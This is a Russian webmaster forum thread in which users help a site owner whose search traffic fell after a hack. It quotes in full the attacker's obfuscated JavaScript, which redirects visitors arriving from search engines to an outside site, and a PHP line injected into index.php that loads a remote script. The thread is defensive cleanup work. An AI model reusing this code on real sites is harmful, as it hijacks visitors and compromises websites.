Сегодня посещаемость упала на 70%

Сегодня посещаемость упала на 70%, Сегодня посещаемость в Яндексе упала на 70%

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#46

3 Июля 2011 00:46

Может конечно и реально сделать самому , но сколько времени пройдет

бр бр бр

hebroid

Сообщений: 514 Регистрация: Июл 2011

#47

3 Июля 2011 00:54

Итак, сайт http://promediagroup.ru/ тут тоже не причем, судя по всему он взломан таким же образом. Вредоносный код у них сидит в ява скрипте.

Значит, ваш сайт каким то образом ссылается на них, грузит редирект с их зараженного сайта, и редиректит на сайт злоумышленника.

Вот содержимое их редиректа:

Код

function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.searchlots-all.ru/%27+%27%3Fwkey%3D"+l('9d837')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}

Как видите,в нем прописаны рефереры поисковых систем.

hebroid

Сообщений: 514 Регистрация: Июл 2011

#48

3 Июля 2011 00:59

На будущее - поставьте в панели управления хостингом полный бекап хотя бы раз в три дня, а лучше каждый день. Из бекапа все можно восстановить в первозданный вид (если бекап чист).

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#49

3 Июля 2011 01:01

Я незнаю как это делается

wabex

Сообщений: 45 Регистрация: Окт 2010

#50

3 Июля 2011 01:07

TEJlO11, скачай файл index.php себена комп, открой его и в самом низу увидешь

Цитата

$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

замени на

Цитата

$tpl->compile ( 'main' );
$tpl->result['main'] = str_replace ( '{THEME}', $config['http_home_url'] . 'templates/' . $config['skin'], $tpl->result['main'] );
if ($replace_url) $tpl->result['main'] = str_replace ( $replace_url[0]."/", $replace_url[1]."/", $tpl->result['main'] );
$tpl->result['main'] = str_replace ( 'img src="http://'.$_SERVER['HTTP_HOST'].'/', 'img src="/', $tpl->result['main'] );

echo $tpl->result['main'];
$tpl->global_clear ();
$db->close ();

GzipOut ();
?>

и все

hebroid

Сообщений: 514 Регистрация: Июл 2011

#51

3 Июля 2011 01:09

Нет у него такого

Цитата
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<sc ript src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);

TEJlO11, если будешь открывать index.php, не открывай блокнотом, открывай ТоталКоммандером.

Изменено: hebroid - 3 Июля 2011 01:11

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#52

3 Июля 2011 01:15

сейчас скачаю командер

wabex

Сообщений: 45 Регистрация: Окт 2010

#53

3 Июля 2011 01:15

hebroid, должен быть у меня такая же проблема как и у него...

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#54

3 Июля 2011 01:24

Нет такого в index.php

wabex

Сообщений: 45 Регистрация: Окт 2010

#55

3 Июля 2011 01:30

можешь выложить куда нибудь свой индекс.пхп?

hebroid

Сообщений: 514 Регистрация: Июл 2011

#56

3 Июля 2011 01:38

Кажется, нашел зацепку.

TEJlO11

Сообщений: 181 Регистрация: Авг 2010

#57

3 Июля 2011 01:38

http://ifolder.ru/24502293

hebroid

Сообщений: 514 Регистрация: Июл 2011

#58

3 Июля 2011 01:46

Не стоило выкладывать.

В index.php ничего не видно.

В исходном коде страницы все видно. Вот эта бяка, аккурат после <boby> сидит:

Цитата
<sc ript src=http://promediagroup.ru/d.js></script><sc ript language="javascript" type="text/javascript">

wabex

Сообщений: 45 Регистрация: Окт 2010

#59

3 Июля 2011 01:47

TEJlO11, хм... ни чего такого нету... может в маин.тпл какой код вставили или в .htaccess попробуй там поискать

TEJlO11 Сообщений: 181 Регистрация: Авг 2010	#60 3 Июля 2011 01:47 И где ее искать не знаешь?

Похожие темы:

28.02.2023 13:51	Сегодня 28.02 не работает вебмастер и метрика
15.04.2021 15:50	Проверьте свою посещаемость
26.02.2021 15:10	Сегодня день Апа ИКС
23.11.2017 03:39	Сегодня сильно упали позиции в Яндексе. Фильтр?
02.07.2017 12:43	Странная посещаемость из поиска

Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)

Новые темы	Объявления	Свободное общение
16:11 Давайте начнем обмен отзывами Google maps 22:14 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 13:03 AntiBot Cloud - бесплатный скрипт и сервис защиты сайтов 13:04 DreamCash.tl - заработок на онлайн-видео. До 95% отчислений, отличный конверт! 20:13 Dao.AD: Монетизация и покупка Push/Pops/Inpage и Video трафика! 15:04 Adtrafico - Правильная партнёрская сеть под бурж трафик 19:21 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options	04:17 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 02:16 BetaTransfer касса — это надежный сервис приема платежей в сфере High Risk 21:43 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 15:03 Продам аккаунты 1 ТБ Облако@Mail.ru 14:59 PlayPay.biz - Лутбоксы с товарами, играми 12:40 Продам аккаунты Gmail USA IP \| Gmail MIX IP \| Outlook Old 12:00 BestChange – обменивать электронную валюту можно быстро и выгодно	23:14 Точные прогнозы на футбол 20:09 Сколько сейчас стоит наполнение ИМ? 12:43 Куплю проигрышные букмекерские аккаунты 04:33 Половина скидок на распродажах — фейк 07:53 НейроБабушка наказывает мошенников 19:59 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 19:57 Пятница 13-ое: VK принял радикальное решение и закрыл доступ к порно контенту